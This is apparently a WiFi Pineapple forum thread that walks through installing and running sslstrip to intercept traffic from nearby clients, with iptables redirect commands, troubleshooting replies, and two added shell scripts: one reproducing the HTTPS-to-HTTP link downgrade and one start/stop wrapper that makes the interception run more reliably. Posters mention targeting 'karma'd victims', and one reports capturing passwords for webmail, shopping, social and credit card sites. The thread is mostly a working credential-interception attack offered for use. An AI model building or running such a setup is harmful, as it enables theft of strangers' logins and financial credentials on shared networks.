
Full Sslstrip Guide


telot


Ok - there's never been a straight-up "How to get sslstrip working" thread - there are quite a few bits and pieces and there's always WM's module... but people still seem to be confused. I aim to put a stop to this via this here guide.

1. Install sslstrip:

opkg update

opkg install --dest usb sslstrip

Note: I install everything to my usb. If you don't have a USB drive, then the command will look like this: opkg install sslstrip (herpaderp)

2. One time configuration of sslstrip:

A HUGE thanks to Vulture for laying this out for us:

ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7

touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

3. iptables configuration - must be run each and every time the pineapple reboots BEFORE you want to run sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

4. run sslstrip!

sslstrip -w /usb/sslstrip.log &

Done! sslstrip is now running in the background! I usually combo this with a little tcpdump - that way you've got every plaintext and ssl'd packet! Hope you all enjoy

telot


Thanks for the write-up Telot. Just wish I saw this guide before I installed the module via the UI. I think the sslstrip is what caused my mkiv to brick. I wasn't able to ssh into it and the web ui was unresponsive. I hit the reset button and now the WPS light is blinking constantly. I hope this will remedy the issue, but can't check it out till I get my TTL cable to do a clean flash.

Edited by BigFanOHak5

Hi Telot

Why would this be necessary? This is ssl traffic and can't be decrypted:

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

Also I am having a problem with direction

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It seems that only the traffic from browsing the pineapple's interface gets redirected to port 10000, not the traffic going through the router.

Unfortunately I don't know enough about iptables to fix this problem.

Any help would be appreciated.

Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?


> Why would this be necessary? This is ssl traffic and can't be decrypted:
>
> iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

lol... that's the point of sslstrip. It decrypts SSL and re-packages it.

Here's more info on it:

http://www.sindark.com/2009/02/21/the-ssl-strip-exploit/

Edited by legion

I get this when I try to run it:

root@Pineapple:/www# sslstrip -w /usb/test

Traceback (most recent call last):

File "/usb/usr/bin/sslstrip", line 27, in <module>

from twisted.web import http

File "/usb/usr/lib/python2.7/site-packages/twisted/web/http.py", line 36, in <module>

from twisted.internet import interfaces, reactor, protocol, address, task

File "/usb/usr/lib/python2.7/site-packages/twisted/internet/reactor.py", line 11, in <module>

from twisted.internet import selectreactor

File "/usb/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 21, in <module>

from twisted.internet import error

EOFError: EOF read where object expected

dies after that

any ideas?


I think you are mistaken, sslstrip does not decrypt anything. It is a transparent proxy that fools the client and server into thinking that they are exchanging information using encryption.

If you are going to quote a web page might as well be the author of the tool:

Moxie Marlinspike

http://www.thoughtcrime.org/software/sslstrip/

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

His site has clear details of how this works.

There is no mention of redirecting traffic from port 443 to the sslstrip port. That would not be possible because ssl traffic cannot be decrypted without a key.

From my understanding sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links.

You can do the same thing with other transparent proxies.

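The two halves of the rewrite that the post above describes (downgrade the links on the way to the victim, upgrade the request again on the way to the server), as an added illustration that is not sslstrip's own code: sslstrip does this in Python inside a Twisted HTTP proxy, this version uses only sed and grep so it runs on the pineapple or anywhere else. The response text, the hostnames and the MAPFILE location are constructed for the demo and are not from the thread.

```shell
#!/bin/sh
# Added illustration, not sslstrip's code: the two halves of the downgrade.
# Connections arrive here because the iptables REDIRECT sent port-80 traffic
# to the proxy; the proxy talks plain HTTP to the victim and real HTTPS to
# the server, so neither side sees a certificate error.

MAPFILE=${MAPFILE:-/tmp/stripped_hosts.txt}   # assumption: where downgraded hosts are remembered

# Server -> victim: read one HTTP response (headers and body) from stdin and
# emit the version the victim will see. Every https:// link, including a
# Location: redirect, becomes a look-alike http:// one, and each host that
# was downgraded is recorded so the reverse direction knows to go back up.
strip_response() {
    tmp=$(mktemp)
    cat > "$tmp"
    grep -o 'https://[A-Za-z0-9.-]*' "$tmp" | sed 's#^https://##' >> "$MAPFILE"
    sed 's#https://#http://#g' "$tmp"
    rm -f "$tmp"
}

# Victim -> server: the victim now asks for http://HOST/PATH. If HOST is one
# we downgraded, the proxy must fetch https://HOST/PATH from the real server
# (which therefore sees an ordinary TLS client); anything else is relayed as
# the plain HTTP it always was.
upstream_url() {
    host=$1
    path=$2
    if grep -qx "$host" "$MAPFILE" 2>/dev/null; then
        echo "https://$host$path"
    else
        echo "http://$host$path"
    fi
}

# Demo on a constructed response: a login link plus a redirect to HTTPS.
if [ "${1:-}" = demo ]; then
    printf 'HTTP/1.1 302 Found\r\nLocation: https://login.example.com/auth\r\n\r\n<a href="https://login.example.com/auth">Sign in</a>\n' | strip_response
    upstream_url login.example.com /auth
fi
```

Run it with `sh strip.sh demo` to see the downgraded response followed by the URL the proxy would really fetch. The caveat a tester should keep in mind: the whole trick depends on the victim's first contact with the site being a plaintext port-80 request that the proxy can rewrite. A browser that already goes straight to https:// (a bookmark, a typed https:// URL, or a site it has an HSTS policy for) never sends that request, and nothing here ever sees it.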

> Why would this be necessary? This is ssl traffic and can't be decrypted:
>
> iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
>
> It seems that only the traffic from browsing the pineapple's interface gets redirected to port 10000, not the traffic going through the router.

I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share.

telot


telot,

Thank you for your input,

Are you saying that if you don't redirect port 443 to 10000 that sslstrip does not work? That would be very interesting.

I am trying to get sslstrip working on the pineapple without ICS and with the IP address changed to my local LAN going through a different lan router just the same as if I was running sslstrip on my laptop. But no luck so far.

I have had no problem in the past getting sslstrip to work on a regular computer.

Just wondering if iptables has some kind of bug on this version of Linux (since I have the same problem on the stock openwrt firmware on the tplink 703, a similar router) or is it that I am ignorant about the way that routers work, and sslstrip needs to have different settings when run on a router?

Any help would be appreciated and would help to expand the different ways that the pineapple could be used as I don't see much benefit from running sslstrip when you have to connect to ICS on another computer. In that case why not just run sslstrip from that computer?


Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working.

TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem. I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 443 dealio, but it works, so who's complaining? :)

telot


> TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem.

I will add the port 443 in the next version, just in case :P

> I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 443 dealio, but it works, so who's complaining? :)

I will see how I can add the possibility to start modules from the Button module. :)

Edited by Whistle Master

> I will add the port 443 in the next version, just in case :P

This is a mistake.

It doesn't make sense to pass encrypted packets to sslstrip's HTTP server which expects unencrypted traffic. The sslstrip manual makes no mention of such an iptables redirection for a reason.

I just downloaded the module on my fresh Pineapple and clients on the network were no longer able to access actual HTTPS websites. I had to comment the line out and everything worked as it should again.


  • 2 weeks later...


Followed your guide, but when I get to this step: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It booted me from the webui and now when I try to get back to the webui, I get problem loading page error. thoughts?

Edited by BigFanOHak5

> Followed your guide, but when I get to this step: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
>
> It booted me from the webui and now when I try to get back to the webui, I get problem loading page error. thoughts?

You could wait a little bit and you will gain access to the webui or you could go to the shell and type: iptables -t nat -D PREROUTING 1 ......... then you will get the webui back.


  • 2 weeks later...

Here is a script that will run the iptables command and launch sslstrip with the date and time as the logfile in /usb. It works when running it from a SSH terminal but for some reason it doesn't seem to work from the WPS button script.


#!/bin/sh
# send clients' web traffic to the sslstrip listener
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
# one log per run, named by the start time
_now=$(date +"%Y%m%d-%H%M%S")
_file="/usb/sslstrip_$_now.log"
sslstrip -w "$_file"

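A start/stop wrapper that covers steps 3 and 4 of telot's guide and does what the script above does, with the rough edges from this thread handled. It is an added example, not the script posted above, not WM's module and not anything from the sslstrip project. It assumes the MkIV defaults of br-lan as the client-facing interface and 172.16.42.1 as the pineapple's own address (set LAN_IF and LAN_IP if yours differ); the /usb/usr/bin/sslstrip path is the one in the traceback earlier in the thread. The redirect rule excludes the pineapple's own address, which is what locks you out of the web UI on port 80, and it redirects port 80 only: the listener on 10000 speaks plain HTTP, so a TLS handshake redirected into it cannot be served, which is the HTTPS breakage reported above. Stop tears the rule down again, so the "fix port forwarding afterwards" step is not forgotten.

```shell
#!/bin/sh
# Added example (not the script above, not WM's module): start/stop wrapper
# for sslstrip on the Pineapple. Usage: sh sslstrip-ctl.sh start|stop
#
# Assumptions, all overridable from the environment:
LAN_IF=${LAN_IF:-br-lan}                      # interface the clients sit behind (assumed)
LAN_IP=${LAN_IP:-172.16.42.1}                 # pineapple's own LAN address (assumed MkIV default)
STRIP_PORT=${STRIP_PORT:-10000}               # sslstrip listen port, as in the guide
SSLSTRIP=${SSLSTRIP:-/usb/usr/bin/sslstrip}   # path shown in the traceback earlier in the thread
LOGDIR=${LOGDIR:-/usb}
PIDFILE=${PIDFILE:-/var/run/sslstrip.pid}
IPT=${IPT:-iptables}                          # set IPT=echo to dry-run the rules

# The match is written once so the add and the delete can never drift apart.
# Only port 80: the listener speaks plain HTTP, so a TLS ClientHello sent to
# it cannot be answered, only broken. "! -d $LAN_IP" leaves the pineapple's
# own web UI on port 80 reachable.
rule() {
    echo "-i $LAN_IF -p tcp --dport 80 ! -d $LAN_IP -j REDIRECT --to-ports $STRIP_PORT"
}

redirect_add() {
    # delete any earlier copy first so repeated "start" runs stay idempotent
    $IPT -t nat -D PREROUTING $(rule) 2>/dev/null || true
    $IPT -t nat -A PREROUTING $(rule)
}

redirect_del() {
    $IPT -t nat -D PREROUTING $(rule)
}

sslstrip_start() {
    [ -x "$SSLSTRIP" ] || { echo "no executable at $SSLSTRIP" >&2; return 1; }
    log="$LOGDIR/sslstrip_$(date +%Y%m%d-%H%M%S).log"
    # full path and explicit port: nothing here depends on PATH or the cwd,
    # which is one thing that differs between an SSH shell and a button script
    "$SSLSTRIP" -l "$STRIP_PORT" -w "$log" >/dev/null 2>&1 &
    echo $! > "$PIDFILE"
    echo "$log"
}

sslstrip_stop() {
    [ -f "$PIDFILE" ] || return 0
    kill "$(cat "$PIDFILE")" 2>/dev/null || true
    rm -f "$PIDFILE"
}

case "${1:-}" in
    start)
        # clients' traffic must be forwarded at all before any of it can be redirected
        echo 1 > /proc/sys/net/ipv4/ip_forward
        # listener first, then the rule, so no client hits a port nobody is on
        sslstrip_start
        redirect_add
        ;;
    stop)
        # rule first, then the listener, for the same reason
        redirect_del
        sslstrip_stop
        ;;
esac
```

Bind `sh /usb/sslstrip-ctl.sh start` to the button and `stop` to whatever you use for cleanup. To see the exact iptables lines without touching the firewall, run `IPT=echo sh sslstrip-ctl.sh start`.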

  • 3 weeks later...

my thoughts after trying different suggestions:

I'm using MkIV with 2.5. Connected via ethernet to laptop running Backtrack5r2. Installed sslstrip via command line to usb. tried running sslstrip via command line with different options.

My results are

1. needed to edit /etc/sysctl.conf file as suggested in another post.

2. you need to forward both 80 and 443. Otherwise either http or https pages hang on loading while the other loads ok. Both seem to be needed for seamless browsing.

3. fix port forwarding after done with sslstrip.

4. had best results with running -k -p switches.

I'll post how it goes with relay configuration with Alfa card next.

Edited by 7ncubane

Sorry for 2 postings in a row.

I've been playing with sslstrip and noticed something.

I was able to sniff my passwords on yahoo mail, gmail, amazon, capital one credit card, and twitter. However, when I tried Chase, Wells Fargo, and Charles Schwab, sign in pages would not even load. The browser just got "stuck".

It seems that sslstrip passes through http traffic ok and processes regular https traffic ok, but seems to be not able to process certain https sites. Anybody have similar experience? Any idea what this "non-standard" https/ssl traffic might be?


thanks for input.

I can run karma and sslstrip at the same time. sslstrip on usb, set up with swap space. Make sure to use powered usb hub. I use separate power source for the hub and pineapple.

Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but urlsnarf needs packets directly from port 80. (I think.)


> Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but urlsnarf needs packets directly from port 80. (I think.)

urlsnarf does not need an iptables set up, it just listens on port 80
